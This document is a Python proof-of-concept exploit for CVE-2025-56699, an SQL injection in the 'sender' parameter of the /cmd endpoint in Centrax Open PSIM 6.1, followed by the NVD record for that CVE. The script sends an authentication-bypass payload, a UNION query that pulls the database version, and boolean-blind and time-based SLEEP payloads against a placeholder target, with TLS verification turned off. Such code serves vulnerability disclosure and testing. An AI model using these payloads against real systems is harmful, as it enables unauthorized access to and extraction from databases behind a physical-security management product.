CVE-2025-56699

# CVE-2025-56699 - Centrax Open PSIM 6.1 SQL Injection PoC # Vulnerability: SQL Injection in cmd component via sender parameter # Author: Security Research based on CVE-2025-56699 import requests TARGET_URL = "https://target-centrax-server" CMD_ENDPOINT = "/cmd" def exploit_sqli(target_url, sender_payload): """ Exploit SQL injection in the sender parameter of cmd component """ params = { "sender": sender_payload } try: response = requests.get( f"{target_url}{CMD_ENDPOINT}", params=params, timeout=10, verify=False ) return response except requests.exceptions.RequestException as e: print(f"[ERROR] Request failed: {e}") return None def test_injection(): """Test basic SQL injection detection""" # Basic authentication bypass test payload_auth_bypass = "' OR '1'='1' --" print(f"[*] Testing authentication bypass with payload: {payload_auth_bypass}") response = exploit_sqli(TARGET_URL, payload_auth_bypass) if response and response.status_code == 200: print(f"[+] Potential SQL injection detected! Response length: {len(response.text)}") # UNION-based injection to extract database version payload_union = "' UNION SELECT @@version,2,3 --" print(f"[*] Testing UNION injection: {payload_union}") response = exploit_sqli(TARGET_URL, payload_union) if response and response.status_code == 200: print(f"[+] UNION injection may be successful") print(response.text[:500]) # Boolean-based blind injection test payload_blind = "' AND 1=1 --" payload_blind_false = "' AND 1=2 --" resp_true = exploit_sqli(TARGET_URL, payload_blind) resp_false = exploit_sqli(TARGET_URL, payload_blind_false) if resp_true and resp_false: if len(resp_true.text) != len(resp_false.text): print("[+] Boolean-based blind SQL injection confirmed") # Time-based blind injection test payload_time = "' OR SLEEP(5) --" import time start = time.time() exploit_sqli(TARGET_URL, payload_time) elapsed = time.time() - start if elapsed >= 5: print("[+] Time-based blind SQL injection confirmed") if __name__ == "__main__": print("=" * 60) print("CVE-2025-56699 PoC - Centrax Open PSIM SQL Injection") print("=" * 60) test_injection()

{"cve": {"id": "CVE-2025-56699", "sourceIdentifier": "[email protected]", "published": "2025-10-16T17:15:34.157", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerability in the cmd component of Base Digitale Group spa product Centrax Open PSIM version 6.1 allows an unauthenticated user to execute arbitrary SQL commands via the sender parameter."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "references": [{"url": "https://basedigitale.com/integrated-security-solutions/security-asset-management/centrax/", "source": "[email protected]"}, {"url": "https://github.com/MarioTesoro/vulnerability-research/tree/main/CVE-2025-56699", "source": "[email protected]"}]}}